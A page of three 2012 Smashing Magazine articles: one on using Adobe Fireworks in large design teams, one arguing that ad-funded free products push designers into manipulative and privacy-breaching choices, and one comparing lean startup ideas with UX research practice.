Smashing Magazine

  • Workflow Tips: Useful Fireworks Techniques And Features For Large Design Teams


    While Fireworks can be a useful and powerful tool for any screen designer, several aspects of it make it really shine in an enterprise environment when used by both small and large design teams.

    What do I mean by “enterprise”? For the purpose of this article, enterprise can be defined as any environment where multiple designers, developers and other stakeholders collaborate on a project. In this situation, Fireworks excels for a variety of reasons.

    I’ll share the top five reasons why our user experience (UX) team at Citrix (which consists of about 20 designers, researchers and editors, working on Web, desktop and mobile applications) uses Fireworks. I’ll illustrate my points with a few practical examples, as well as examples from other design firms.

    1. The (Smart) Fireworks PNG File Format

    A huge benefit of Fireworks is that it saves images in the PNG file format. PNG files are viewable in any browser or image viewer. And Windows Explorer and Mac’s Finder will display thumbnail previews of your Fireworks PNG files when you browse them locally.

    Fireworks efficiently embeds all of the vector layer data into the meta data section of the PNG. This means you can view a Fireworks PNG file in any image viewer or directly in a Web browser, and if you open the same PNG in Fireworks, you have full editing capability of the vector paths, layers, pages, live filters, embedded bitmaps, symbols, etc.

    The PNG format is also very efficient. In our experience, even complex multi-page documents rarely reach over 5 MB.

    What does this mean in the enterprise? Quite a lot, actually!

    On our company’s internal network, we have a shared drive that everyone stores files on. When we want to share mockups with stakeholders in the company, we just point them right at the files. For instance, if a PNG file is located at X:/UXGroup/Project/Design.png, we can send a link to anyone in the company (i.e. http://shared/uxgroup/project/Design.png), and they can view the file in their Web browser — no need to export the Fireworks PNG to any other format!

    This saves us the additional steps of exporting JPGs (or PNGs) of our design files whenever we want to share them with stakeholders or with anyone who doesn’t have a copy of Fireworks.

    I can even edit a file in Fireworks while on the phone with a stakeholder (or fellow designer), and as soon as I hit “Save” in Fireworks, the person on the other end of the line can simply refresh their browser and see the changes I just made! Excellent for quick copy revisions and brainstorming.

    Nathan Smith describes a similar process in his article “Fireworks in Enterprise IT”:

    “Working as an interface designer at a Fortune 500 company, I used to save my work on a shared network drive. The user experience team had full access to our Adobe Fireworks PNG files, whereas all other stakeholders in the company (of which there were many) had read-only rights. This setup allowed my team to go about working in a typical fashion. When it was time to get sign-off for our mockup designs, rather than performing a batch export of hundreds of PSD files to JPG (or other) image format, we would just send a quick email: “Here are the project comps: http://10.10.10.xx/uxd/project/.”

    The approval team could then peruse the interface mockups at their leisure, without us having to do anything extra special to allow them to see our designs. Even better: being on a conference call with the primary stakeholders reviewing my PNG file in their browsers, I could edit the design in real time, based on their feedback. I cannot even begin to estimate the amount of time I saved.”

    This can also work beautifully with any FTP client or with synchronization software such as Dropbox. Just place your PNGs in your Dropbox folder and send the public URL to your stakeholders or share the folder with them. Now, whenever you hit “Save” in Fireworks, your changes will be instantly synced to everyone you have shared them with.

    One caveat to this approach is that browsers display only the first page of a Fireworks file. So, if your document has multiple pages, you will need to export each page to its own PNG file. On the positive side, Fireworks has fairly robust page-exporting options that make the process very easy, allowing you to export multiple pages at once.

    2. Layer Management

    If you are a Photoshop user, then you are probably very familiar with “layer management.” You have read articles on PSD etiquette and, heck, you might even be a Layer Mayor. While I can appreciate organization, managing layers and layer groups doesn’t sound like fun.

    Fireworks Manifesto
    (Illustration sources: Dan Rose, Tymn Armstrong, Michel Bozgounov,

    In Fireworks, I hardly ever glance at the Layers panel. Alan Musselman, designer and developer of Android games, sums it up nicely:

    “By the time you organized your layers in Photoshop I’m outside enjoying the weather because I’m finished with the project [in Fireworks].”

    How is this possible?

    Fireworks’ interaction methodology is similar to Illustrator’s: when you hover your mouse over each object on the canvas, the object is highlighted (its outline changes to red), and then you can simply select it by clicking on it (the outline will change to blue). You can also select several objects by clicking on each while holding Shift or simply by dragging the mouse across them all.

    Selecting objects on the canvas that are placed underneath other objects is possible, too, as Trevor Kay explains in “Interactive Prototypes and Time-Savers With Adobe Fireworks”:

    “The Select Behind tool enables you to select a top-most object and, with repeated clicking, select each of the elements directly beneath it in turn. This is yet another feature that helps you work more efficiently by not requiring you to awkwardly navigate the Layers panel, searching for an object either by name or tiny thumbnail.”

    In practice, this means you don’t need to bounce back and forth between the Layers panel and the canvas to find and select objects — you just work directly with them. I find it a much more intuitive way to work.

    What’s more, after selecting one or more objects, you can easily change many of their properties all at once:

    • Resize, skew, rotate and use the 9-Slice Scaling tool;
    • Change the fill or stroke (edit colors, work with gradient fills, change the size and type of stroke, etc.);
    • Add or remove Fireworks live filters (and edit their properties);
    • Apply styles;
    • Change the objects’ blending mode;
    • Add or remove textures and patterns;
    • Change the roundness of rectangle corners;
    • And much more.

    In short, what can be done with one object selected on the canvas can be done with multiple objects simultaneously. This really is a big time-saver, freeing you from having to hunt through the Layers panel!

    Besides being a much faster and more intuitive way to work, it also makes the process of multiple designers collaborating on the same file or project much easier.

    Finally, let me add that while naming layers and objects in Fireworks is often not necessary, it is still a good practice, especially when working on more complex projects. If you foresee opening an archived file years later or frequently sharing files with collaborators, then naming layers and objects will make file organization more efficient.

    3. Did I Mention Pages And Master Pages?

    Pages are a feature that illustrate a key difference between Fireworks and Photoshop. When working on complex interactions (a shopping-cart check-out flow, for example), showing how interactions unfold over time is essential. Having the ability to create multiple pages allows you to easily do this.

    It also helps to keep the number of separate design files low, which, combined with the fact that each page can have its own settings (canvas size, canvas color, export settings, etc.), gives you a ton of flexibility.

    And if you are using Pages in Fireworks, you can easily jump from a static design to an interactive prototype, which brings even more benefits (more on that later).

    If you use pages, you can also create master pages. Master pages allow you to define common elements that appear across multiple pages. For instance, on the master page, you might put the website’s logo and header. As you create new pages, those elements will automatically appear on them, and if you make a change to any element on the master page, it will appear throughout the document. If you need to modify the header or any other recurring element, this method is far quicker than having to open multiple files and individually edit the given element in each one or having to manually tweak the same elements on multiple pages (or multiple layers).

    Let me quickly illustrate this feature. For an example, we’ll use the UI wireframe sketches of Chris Stevens.

    Suppose we have a design in which several elements — the header, logo, navigation and footer — will be the same on all pages. Let’s move them to the master page. All of the other pages will display these elements just as they appear on the master page:

    Master Page Elements On All Pages
    Elements on the master page will automatically appear on all pages.

    Next, suppose the design team decides that moving the logo to the right side and moving the navigation to the left would be better. The elements, which exist on the master page, need to be altered only once, then all of the other pages in the design will instantly reflect those changes:

    Simultaneous Update On All Pages
    Edit an element (or several elements) on the master page and see all pages updated with those changes!

    Fireworks has other features that make complex design projects easier. Here are just a few:

    • In Fireworks, you can turn any object or group of objects into a symbol. Just create a symbol and copy it to a few layers and/or pages; then, whenever you edit the symbol, all instances of it throughout the document will automatically update. Symbols can be of different types — graphic symbols, button symbols, and component (rich) symbols — each of which serves a different purpose and has different benefits. (If you want to learn more, the “Symbols” section in Adobe’s documentation for Fireworks might help.)
    • Fireworks gives you the option to share layers to pages (i.e. share the contents of one layer to selected pages), so if the content of a layer is updated, then the changes are automatically shown on all of the pages on which the shared layer appears).
    • If you work with states, you also have the option to share states to pages.
    • You can use styles in your Fireworks PNG documents (and can even import and export them to reuse in more than one document).

    By taking advantage of pages, master pages, symbols and styles, every designer on our team saves a huge amount of time every day!

    4. Interactive Prototyping Made Easy

    If you are creating a complex interaction that spans multiple pages, being able to prototype the interaction before investing precious development time in coding it is often very beneficial. Again, Fireworks comes to the rescue with its built-in capabilities to create simple click-through prototypes for multi-page documents.

    This subject was covered thoroughly by Smashing Magazine in a recent article by André Reinegger, “Create Interactive Prototypes With Adobe Fireworks” (quoted below), and one by Trevor Kay, “Interactive Prototypes And Time-Savers With Adobe Fireworks.” Check them out!

    “A click-through prototype is an interactive mockup of a website or application that allows you to click through different pages and states and is packed with key interactions. Creating such a prototype in Adobe Fireworks is very easy. All you have to do is prepare the design for exporting as an interactive prototype: create slices for all interactive areas on the screen, and make pages for all of the different states of the application.”

    By defining slices and hotspots, you can quickly link the pages in your document together and export them all at once as HTML files.

    Create Interactive Prototypes
    André Reinegger explains in detail how to create interactive prototypes with Fireworks. Pages and hotspots are key parts of the process.

    For instance, if your shopping cart has a “Buy now” button on the first page, you can specify that, when clicked, the button will take the user to page 2 of the design; and on page 2, you can define more interactions, and so forth. Similarly, you can create simple navigation between the pages or create links that point to external resources. What’s more, any behavior added to the master page will also be active on every other page in the document (so, a navigation bar graphic could serve as a navigation bar in the whole interactive prototype). Build it once and it works everywhere!

    Interactive prototypes also help you quickly experience how an interaction feels as you click through it. You can even use these prototypes for user testing, to work out any kinks before investing in the actual development.

    Of course, you always have the option to use an external application for the live-interaction part of the design and development process, but for simple interactions, Fireworks does the trick nicely, and we don’t even have to switch to another app.

    5. Fireworks Component Library With Evernote

    One thing that makes collaboration between designers and developers much easier and more efficient is having a common set of design resources. Fireworks has a “Common Library” panel, but I won’t sugarcoat it: it’s not useful when multiple designers are collaborating and need to share a library of UI resources that needs to be updated over time.

    However, taking advantage of Fireworks’ use of vector PNG files, we can use a third-party service — namely, Evernote — with Fireworks to create and maintain a synchronized component library. This will allow all designers on the team to simply drag and drop Fireworks PNG elements into their layouts from a common source. (See “Creating a Pattern Library With Evernote and Fireworks,” in which I speak about this technique in greater detail.)

    Here are the benefits of this workflow:

    • Easily browsable
      Finding what you’re looking for is easier when you can just see it. And because source Fireworks PNG files can be viewed in the browser just like any regular image file, you can find the right asset in Evernote simply by browsing for it — while examining the previews! (This wouldn’t work with Photoshop, Illustrator or InDesign files because browsers cannot read their proprietary file formats.)
    • Searchable
      If you can’t find it by browsing, just search. And in Evernote, even the text in PNG files is indexed (a truly amazing feature, which, again, is possible because of the PNG format’s openness).
    • Drag and droppable
      Pulling elements into your layout is super-easy. Simply drag and drop them from Evernote into the Fireworks document!
    • Synchronized
      Any change made to a UI element propagates instantly, and everyone on the team always has access to the most recent version. Plus, Fireworks PNG files are fairly small, so synchronization is fast and easy.

    Evernote And Fireworks
    Evernote and Fireworks can make a component library an easy solution.


    It’s fair to say that Fireworks is not perfect and has its limitations. For example, if you exceed a certain number of pages or objects in a file, Fireworks could suffer some drop in performance. The app is not 64-bit, so it cannot use all of the 16 GB of RAM you’ve just installed in your new computer, and its user interface is slightly different than other tools in the Adobe family.

    However, in our design practice, we’ve found that the benefits of Fireworks far outweigh the disadvantages.

    In one relatively short article, I can’t cover all of the reasons why we use Adobe Fireworks, but if you (and your design team) work in the field of screen design — UI, UX, Web, mobile — then I hope the five above are enough to give you ideas or inspire you to try something new!

    Further Reading

    Here a few links to articles, tutorials and blog posts that discuss some of Fireworks’ most interesting features, as well a few complex workflows that are possible with it:

    (mb al)

    © Kris Niles for Smashing Magazine, 2012.

  • Uncompromising Design: Avoiding The Pitfalls Of Free


    Misaligned interests create tension in the design process that can lead to bad, and potentially unethical, design decisions, that result in inferior products. In this article I will examine how the desire to build a large audience by giving away your products and services free of charge can cause conflicts of interest, which in turn can lead to dubious compromises in the design process that limit the full potential of your work.

    The recently launched Twitter competitor,, which has raised over $800,000 in the first month of fund-raising/pre-sales, has started its life as a simple premise: Twitter doesn’t work because the interests of the company and its users, along with the developers creating apps for its platform, are not aligned. They’re not aligned because as a free product Twitter doesn’t make money from its everyday users and developers, and thus does not hold any obligation towards them. Like most other free Web services, Twitter is building its business model on advertising, the advertiser becoming the customer, and its users, bluntly put, the product.

    While it is possible that the interests of the multiple parties you are trying to satisfy with your product or service overlap, it is likely that there are also differences in what they want. In those cases where the interests vary, the product designer will have to pick the party whose interests will take precedence in their design decisions.

    For example, if you build an audience of users through a free product and then go on to sell advertising, there may arise a conflict of interests on the issue of privacy. The advertiser benefits from knowing more about the users, while some users may wish to keep their information to themselves. The two conflicting interests force the designer to pick a side, either to push for more information sharing in order to make the most out of advertising, or to take a stand on the privacy of their users while losing the potential for more advertising revenue. If they decide to give away user information without their permission they will also be giving away their users’ trust, along with their own integrity.

    Nothing Is Free

    All work requires compensation, whether monetary or otherwise. Sometimes we choose to work for free, in regards to money, but that choice is always based on some other form of compensation. When we give someone a gift, we receive emotional compensation in return because the action of giving a gift satisfies our desire to please someone we care about. We may give a gift to somebody we do not know, but this also works the same way, providing us with emotional nourishment that satisfies a compassionate soul. Sometimes we create work for ourselves, that is, we work on something because we enjoy the creative process itself, the work being its own goal. In those cases, the process, together with the end product, are our compensation.

    An artist may work on a painting for its own sake, the work being its own reward, but they will not work for free when commissioned to produce a piece for somebody else, unless of course they have the desire to present the work as a gift, in which case they must know the person they are working for well enough and care about them enough to feel that the emotional reward outweighs the toil. When this is not the case, when they do not wish to give away their work as a gift, they will seek monetary compensation, for even though they may enjoy the process of creation itself, the act of giving away their finished work and their time — and thus, a little of their life — requires fair compensation.

    Money Or Love
    The designer’s dilemma lies often in the difficult choice between monetary payment and satisfaction of a job well done. Image by Opensourceway.

    Developers of today’s free Web apps and sites do not know their users well enough in order to give away their work as a gift. The bond between them and the recipient is not so strong as to generate enough desire in their hearts to wish to give away their work for free. One exception to this is the open source movement, in which case the work is given away as a gift, though the compensation has less to do with the recipient than with the intended function of the work.

    Open source software is first and foremost created to satisfy a certain goal that the developer has, and the fulfillment of this goal is reward enough for them. They then release their work into the world and may derive further benefit, like patches to the software and prestige for themselves, but this further benefit is only an extra, only the icing for the cake which has already been eaten. In a few cases the software takes off and grows at a rapid pace, but the initial compensation has already been paid in giving the developer what they wanted when they first set off to create it.

    Contrast this with free products and services that are not open source. Those products are given away free of charge, but they are not given away free from the maker’s desire for compensation. Since compensation does not come from the users it is sought elsewhere.

    Advertising: A Gateway To Conflict Of Interests

    Typically, this path leads to advertising. If the users aren’t going to pay for their product, the advertiser will pay for the users. The product developer begins to introduce ads and other forms of sponsorship deals. This creates a conflict of interests. On one hand, the product serves a specific purpose for the user, on the other, an ulterior motive is introduced in the form of advertising, which in turn uses the product as a means to sell something else, the product itself being relegated to the status of a promotional vehicle. The focus of the product is split in two:

    1. it must work to perform a certain function for the user, and
    2. it must get the user to click on an ad.

    While it is possible to keep these two goals separate, in many situations they are not mutually exclusive, which forces the designer to pick sides and make compromises.

    Some product designers and developers proceed to mask this conflict of interests by pretending that the two goals don’t actually point in different directions, and that their primary focus is always on making the best product possible, which in turn brings them more users, and thus more advertising money, the latter being the outcome of the former.

    This stance is taken for two reasons. First, telling users that they are the product is not going to go well with them, and neither will admitting that you are compromising design decisions that improve the product to the advantage of the user for design decisions that only benefit the advertisers.

    Second, this viewpoint may even be a subconscious reaction to the inner dilemma that the product designer has to face when they are forced to pick between two or more conflicting interests. A good designer does not want to compromise their integrity. They want to make the best product they can, which means a product that best serves its primary purpose, that is, its function for its users, so they try to resolve the conflict with a different explanation.

    Twitter Changes
    Since Twitter relies on advertising, it had to make quite unpopular decisions recently. The company limited access, enforcing display requirements, and forming guidelines for what sort of apps they want (and don’t want) to see on the platform.

    But this doesn’t work. You can pretend the conflict of interests isn’t there but that will not make it disappear. For example, Twitter recently began to push back on developers who make apps for their platform by limiting access, enforcing display requirements, and forming guidelines for what sort of apps they want to see on the platform, and what sort of apps they don’t. Apps that are seen to compete with Twitter’s main offering, i.e. consumer micro-blogging, are discouraged.

    Twitter’s initial goal was the creation of a simple micro-blogging service, which they’ve allowed to evolve into different forms to suit its many uses. But now, having to face the reality of needing to make the service pay, they turn to advertising, and in turn are forced to enact much greater control over how the user interacts with their product in order to reshape the service into a viable advertising channel. Now, there is nothing wrong with Twitter taking the advertising route to make money. That’s not the issue. What’s wrong is the situation in which they find themselves, having to strike a compromise between the needs of the advertiser and the needs of the many developers of Twitter apps who have helped get the service to where it is today.

    Twitter does not technically owe anything to those developers, but to push them aside when you’ve reaped the rewards of their labor is not a decent thing to do. The roots of the problem are unclear commitments, which have been there from the very beginning. If the developers paid for the service, Twitter could work without hesitation on delivering them the best platform and API for their apps. Without this commitment, the various parties work together on a foggy perception of aligned interests, only to later find themselves in trouble when they discover that their interests aren’t so aligned after all.

    Then we have the problems with privacy breaches that pop up all the time with services like Facebook and Google (Wikipedia has whole pages dedicated to listing criticisms of the two companies, here’s one for Facebook, and one for Google). Once again, these companies don’t make money selling a service to the end user, they make money from selling advertising. This creates a conflict where the product developer has to decide whether to focus on satisfying the needs of the user, or making the service more lucrative to advertisers by sometimes breaching the privacy of their users. The issue would not exist if people paid for their search service or for their social network, which would remove the advertiser from the equation and let the company focus solely on delivering the best product for the user, but as this isn’t the case, we are left in a situation where the interests of one party are compromised for the interests of another.

    There are also the really obvious dishonest design decisions used in social games like that of Zynga, whose interests lie in promoting the product in order to pull in more users rather than actually making a good product. For example, they have a dialog prompt with only one button that says “Okay”. The dialog asks the user whether they will give the app greater access to their Facebook timeline, i.e. let it make posts on the user’s behalf, but there is no option to close the dialog, only to agree with it.

    Upon clicking the button, the actual Facebook permission box pops up which lets the user decide whether or not they wish to give these permissions to the app, but because the previous box has already conditioned them to agree, they are more likely to simply click “Okay” again in order to proceed, rather than stop to make a conscious decision.

    Manipulative Zynga Prompt
    A manipulative Zynga prompt. The two buttons, “Accept” and “Cancel”, are about sharing a message with your friends, but the wording makes it seem as if they are to do with accepting the reward itself.

    On the one hand, the designer is tasked with creating an informative dialog box meant to help the user make a rational decision, on the other, they are tasked with creating a dialog box which will manipulate the user into acceptance, and because they are not committed to delivering the best service they can for the user, they pick the latter. The interesting thing with Zynga is that they actually do make money from their users, but they do so only from the small percentage who pay, not from the whole user base. This means that to make money they have to capture masses of users, like dropping large fishing nets into the ocean to catch the few “whales” (the term used in the industry for large spenders) along with a pile of bycatch.

    Lastly, consider all the online blogs and magazines that cram their pages with ads leaving no room for the content, and also the content itself, which takes the ever more sensationalist nature by the day, its only purpose being to bring in more page views, not to enlighten readers. For example, The Huffington Post split tests headlines to arrive at the one that brings in the most hits, thereby trading the experience and judgement of the author for the impulses of the masses. Because the reader is not the one paying, these sites hold little loyalty towards them, leading to design decisions that optimize for page views and ad clicks rather than for the creation of the best possible reading experience. Such sites also like to introduce design tricks like pagination, the goal of which is to once again boost page views, while they try unsuccessfully to convince us that clicking multiple times on a set of small page links somehow leads to a better user experience.

    The conflict of interests that arises naturally in free products derails the designer’s core goal of making a great product, that is, a product that aims to fulfill its primary purpose of satisfying the user as best as possible. Loyalty to multiple parties with disparate goals is impossible, which leads to friction in design decisions and in the soul of the designer, forcing them to make dubious compromises in their work. Each small compromise doesn’t seem like a big deal, a little manipulative form box here, a tiny breach of privacy there, but remember that the final product is the sum of its parts, and so in the end, the multitude of small compromises add up into a substantial whole.

    If Compromise Isn’t An Option, Free Is Not A Solution

    A compromise is a concession on the part of all the parties involved, not just some, and you cannot compromise on principles without destroying them altogether. For example, there can be no compromise between truth and falsehood for you cannot make something just a little less true. In the same way, surrendering your users’ privacy or manipulating them into taking an action for your own gain is to surrender your honesty, and in turn, a part of the moral foundation upon which your work is built.

    Whenever you feel a tension in making a design decision that you think is caused by a conflict of interest, ask yourself exactly what compromise you’re asked to make. Are you asked to make a fair concession between one party and another from which both will derive benefit, or are you asked to take something from your users without their permission, or make them do something they have not agreed to do? Are you asked to make a decision that will compromise the integrity of your work?

    Faced with this dilemma, what do you do? The answer is simple, and is the very thing you should have been doing all along: charge money for your products. By selling your work instead of giving it away for free your interests and those of your customers — who are no longer just users — are aligned: they provide you with the compensation for your work, not some outside party, leaving you free to focus on delivering the best product, for them. This is not only moral in that you no longer have to compromise the interests of one party for those of another, it is also a much simpler solution. You make a product and sell it directly to the customer, no need for other parties, nor conflicting interests, nor dubious design decisions. proclaims ad-free social networking in their banner. Because the membership fees are placed right next to it, the user never wonders where the catch is.

    It works, too. A great example is the project which I’ve mentioned at the start of the article. Its creator, Dalton Caldwell, wasn’t satisfied with the way Twitter was treating its developers, so he set off to create his own micro-messaging service, with the difference being that this service would be paid for at the outset by its users and developers. Caldwell set a minimum of $500,000 for his fundraising month during which people could sign up for a year of service to a product that didn’t yet exist.

    In just a month he raised over $800,000 and has launched an alpha version of the service. His critics have been saying that nobody would ever pay for a Twitter-like service, but clearly there is enough value there for some to sign up for a paid alternative. It is far too early to judge the future of the venture, but the initial fundraising success shows that people are prepared to pay for services they care about, even with the presence of free, established alternatives.

    Charging For Online Content Works

    On December 10th 2011, the stand-up comedian Louis C.K. decided to release his full-length special Live at the Beacon Theater on his website as a DRM-free download for $5. Two weeks later, sales from this self-published special exceeded $1 million. The download was DRM-free, meaning that people could easily pirate it, but given the fairness of the price and the package that route just wasn’t worth it. Yes, not everyone can re-create the success of Louis C.K., but that’s not the point. Of course to drive product sales you need to generate enough excitement and interest — that’s the job of marketing. The point is that selling digital goods on the Web is possible, and, when you have something people genuinely want, can be very lucrative. The success of Louis C.K. has since inspired other comedians, namely Aziz Anasari and Jim Gaffigan, to adopt a similar distribution model.

    Last year, The New York Times put up a paywall around its online articles. The paywall allowed visitors to read 10 articles a month free of charge, but required a paid subscription for subsequent access. The implementation of the wall was very porous, meaning that it was very easy to get past it with a variety of simple steps, and so many critics believed that people wouldn’t be fooled into a paid subscription. Just four months after the implementation of the paywall, 224,000 readers have already signed up to the paid subscription, not far short of the company’s goal of reaching 300,000 subscribers within a year. Combined with sign-ups through other channels, such as Kindle and Nook subscriptions, the total of digital subscribers rose to around 400,000. Although this number still makes up a small portion of the newspaper’s revenues, it highlights healthy growth and proves that charging for online content can work, even in the face of everyone else giving theirs away for free.

    The New York Times Paywall
    The New York Times paywall prompt. Even though there are simple tricks to get past it, many people still prefer to pay for their content.

    Other newspapers like The Wall Street Journal and The Economist successfully use the same model by keeping most of their content accessible only to paid subscribers. When you charge your readers for content, you no longer need to run after page views by creating sensationalist work, nor does your website need to try and squeeze ever more page loads out of each visitor through design tricks like pagination. Once your readers have subscribed and paid, they’re going to read what you have to say no matter how attention grabbing or plain your headlines are, freeing your authors and journalists to focus on creating work that enlightens your readers, not shallow content designed to spread.

    For an example of design related publishing consider the success of Nathan Barry and Sacha Grief, whose two eBooks combined have made them $39,000 worth of revenue — and are still selling. Bloggers like to give away their experience for free, and while this is great for the readers, it doesn’t help pay the author’s bills. Some put up a few ads on their site, but unless they consistently generate a lot of traffic, the revenue generated by the ads won’t amount to much. Instead of chasing after advertising pennies, why not package your experience into a book? If your audience is tech savvy, you won’t even need to print the book — just offer a DRM-free eBook package that your readers will be able to consume on any device of their choice. The success of Barry and Grief shows that people are ready and willing to pay for good content, you just have to give them the opportunity to do so.

    As for an example of well implemented advertising, consider The DECK ad network, which includes some of the top tech sites around the Web like the Signal vs. Noise blog from 37signals, Dribbble, Instapaper, A List Apart and many more. The ad network uses a very unobtrusive 120×90 pixel banner, with a sentence or two of text underneath. Its small size shows respect for the end user by keeping advertising within strict limits. It’s a subtle way to advertise which has inspired other networks to offer the same format, such as AdPacks from BuySellAds. This small format won’t work for everyone — most of the sites that use The DECK rely on other sources of revenue — but it is a good way to deliver a cleaner experience for the user while still providing an advertising channel.

    Summing Up

    Free products themselves are not the problem. We give gifts all the time and the giving of them to the people we care about is reward enough for us. The problem is the giving away of free products and services while still expecting compensation. If the compensation does not come directly from the user, the developer proceeds to extract it by other means, which usually involves bringing in other parties to the table, leading to a conflict of interests. When the interests of the user and the product maker are not aligned, not only do you get a neglect in the feature set, but a product of a wholly different nature. The conflict is not just external, it exists inside the mind of the designer, and a battle is fought every time they are put into a situation where they have to limit their full creative potential by compromising the interests of the user.

    It doesn’t have to be this way. People will pay for design and content created to serve them, not to exploit them. People have paid for centuries, and they will continue paying for goods and services that give them value. Instead of picking the path of free design, take the road of moral design — design firmly based on the moral values that guide your life and your work. By turning your users into your customers you eliminate the conflict of interests and thus free your mind to work fully on the problem at hand, and any compromises that you make will be real and fair compromises, that is, design judgements that improve your product by taking it in the direction you want it to go, not dubious choices that surrender your values, limit your creativity and cripple your work.


    © Dmitry Fadeyev for Smashing Magazine, 2012.

  • Entrepreneurship: Lean Startup Is Great UX Packaging


    When Albert Einstein was a professor at Princeton University in the 1940s, there came the time for the final exam of his physics class. His assistants passed the exam forms to the hundreds of students, and the hall was dead silent. One of the assistants suddenly noticed something was wrong.

    She approached Einstein and told him that a mistake had been made with the exam form and that the questions were the same as those in the previous year’s exam. Einstein glanced over the exam form and said that it was OK. He explained that physics had changed so much in the last year that the answers to the questions were now different.

    The lean startup movement, like Einstein’s physics exam, talks about the same things that UX people have talked about for decades. The difference is that people are now listening. Lean UX is an approach that quickly followed the lean startup movement. It is not a new thing. It’s just a new name for things that were always around. The difference is in the packaging of these ideas.

    One other factor that has changed dramatically is the audience. Entrepreneurs and startup founders have always been asking themselves how to develop great products. The answer that UX practitioners, usability professionals and UX researchers have been giving them was too complicated. UX people (me included) have been using disastrous jargon that only we understand. We have been talking about usability tests, personas, field studies and areas of interest in eye-tracking studies.

    The lean startup answer to the same question uses plain language that people understand. When I say, “We need to conduct a contextual inquiry,” I usually get a deer-in-the-headlights reaction. When a lean startup person says they are “getting out of the building,” it is a whole different story. We mean the same thing; we use different words.

    Does it matter? I think it does. Who would have thought that startup companies would be looking for UX people and UX founders, and would become interested in doing usability testing, iterative design and customer interviews?

    This article takes the principles of the lean startup and suggests their UX research equivalents. Hopefully, it sheds some light on why the lean startup concept is so very well accepted in the entrepreneurial world and why startups suddenly want to do UX research and design.

    Validated Learning And Usability Testing

    The lean startup movement claims that startups exist not just to make stuff, but to learn how to build sustainable businesses. This learning can be validated scientifically by running frequent experiments that enable entrepreneurs to test each element of their vision, as outlined by Eric Ries in his book The Lean Startup. In my interview with Ries (embedded below), the most familiar voice of the lean startup movement, for my book It’s Our Research, he calls for entrepreneurs to double-check their assumptions to verify that they are right. He determines that validated learning exists to help entrepreneurs test which elements of their vision are brilliant and which are crazy.

    In the UX world, we call in the product development people to evaluate their design assumptions in usability tests. We urge them to ask users to complete tasks while using the think-aloud protocol and to identify usability problems.

    An interview with Eric Ries about getting stakeholder buy-in for UX research and how it relates to the Lean Startup ideas.

    When entrepreneurs hear “validated learning,” they can see the benefit. They understand that this concept refers to proving or disproving their assumptions. When they hear “usability testing,” they associate it with a time-consuming, money-eating, academically oriented project.

    Validated Learning
    Validated learning: You believe you’ll find a new continent if you keep sailing west. So, you test your idea and verify the route using scientific methods and measurements.

    Build-Measure-Learn And Think-Make-Check

    The fundamental activity of a startup is to turn ideas into products, to measure how customers respond and then to learn whether to pivot or persevere. All successful startup processes should be geared to accelerate that feedback loop. As Ries explains, the feedback loop includes three primary activities: build (the product), measure (data) and learn (new ideas).

    Build-Measure-Learn And Think-Make-Check
    Eric Ries’s Build-Measure-Learn feedback loop and the Think-Make-Check UX cycle.

    The lean UX approach calls for a slightly different cycle: Think-Make-Check. The difference, according to Janice Fraser (cofounder and first CEO of Adaptive Path), is that this latter feedback loop incorporates your own thoughts as a designer, not just ideas learned through measurement. Janice, who now leads LUXr, indicates that the pattern of a lean startup is an endless loop consisting of two steps: Prove-Improve, Prove-Improve, Prove-Improve. This means that you design something, learn about it, make it better, learn again and so on. There is no room for people who are afraid to put their creations on the line for testing. These two feedback loops are very similar and are making a lot of sense to people in both the entrepreneurial and the UX worlds.

    Build-Measure-Learn: How do you build the fastest ship? You try to build and test your hypothesis; you measure the result; and then you learn new knowledge that you can bring to your next ship design.

    MVP, And “Test Early And Often”

    The minimum viable product (MVP), as Ries explains it, is a version of the product that enables a full turn of the Build-Measure-Learn loop with a minimum amount of effort and the least amount of development time. How many times have UX people told their stakeholders that for every dollar spent on solving a problem during product design, $10 would be spent on the same problem during development, and $100 if the problem had to be solved after the product is released?

    We’ve known for years that product prototypes are to be evaluated early in the development process (not just prior to launch). We’ve also known that these evaluations are most valuable if they are repeated throughout the process. The MVP is, in fact, an early prototype that serves as a tool to learn and test the team’s assumptions.

    <br /><br />
Minimum Viable Product
    MVP: You want to build a huge ship, but instead of building the ship right from the beginning, you start by testing your idea with minimal design to see if it floats.

    Pivot And Iterate

    To use the analogy of a basketball “pivot,” one foot of a business is always firmly rooted in what the team has learned so far, while the other foot is moving and exploring new ideas for the business. Instead of taking the big risks of developing something huge, lean startups take small steps forward, developing things and pivoting to better directions. This way, if they fail, the fall will be less painful and will allow them to bounce back and continue. On the other hand, if they had climbed a big cliff, the potential fall would be deadly.

    This reminds me of why we pitch for an iterative design process or for using the RITE methodology (rapid iterative testing and evaluation). Many product development decision-makers feel that the best time to conduct a usability test is near launch time, when things look good and are “ready” for users to play with. Many UX research practitioners know that when they agree to conduct a usability test right before a product is launched, especially if this is the first usability test for the product, the following is most likely to happen:

    1. The study will result in a long list of defects (i.e. usability problems);
    2. The product team will be presented with a long list of issues exactly when they are trying to shorten the list of issues;
    3. Only the easiest problems to fix will be taken care of;
    4. The most important problems will be ignored and the product will be launched;
    5. By the time the team is ready to start working on the next version, there’s already a long list of new features to be developed, leaving the usability issues low down on (or off) the priority list.

    The solution to all of this is to adopt an iterative design process that involves fast rounds of small-scale usability tests. Jakob Nielsen has been preaching this for years now. And then along comes Eric Ries, who talks in the most natural way about pivoting companies, directions, customer segments and design. People don’t iterate, they pivot.

    Pivot: You want to defeat your opponent, but it is difficult to win instantly by launching a full-scale attack in one shot. The proper way would be to advance and attack step by step, always keeping one foot on the ground and ever ready to bounce back in case an attack is not successful.

    Customer Development And Fieldwork

    The term “customer development” was coined by Stanford University professor Steve Blank, one of the fathers of the lean startup movement. Customer development means developing your own understanding of who your customers are, what they are like and what their needs are. This is done through an approach guided by the mantra “Get out of the building.” This mantra urges entrepreneurs to interview potential customers, to observe them in their own environment and to try to make sense of it. What a revelation to our UX research ears, huh? We UX people have been getting out of the building for a living for decades now. We call it by different names: ethnography, fieldwork, generative research, exploratory research, discovery research, user research, design research. Phew!

    Customer Development
    Customer development: You want to trade with a country in the Far East. However, when you finally get to talking with the people of the country, you realize that they prefer to trade with your scientific equipment rather than your gold coins.

    The Bottom Line

    The lean startup movement, like the story of Einstein’s physics exam, talks about the same things that UX people have talked about for decades. The difference is that people are now listening. The lean startup movement, followed by the lean UX approach, did not reveal any new UX concept. Lean startup thought-leaders do a terrific job and do an awesome service to UX people who struggle to get buy-in for design thinking and UX research.

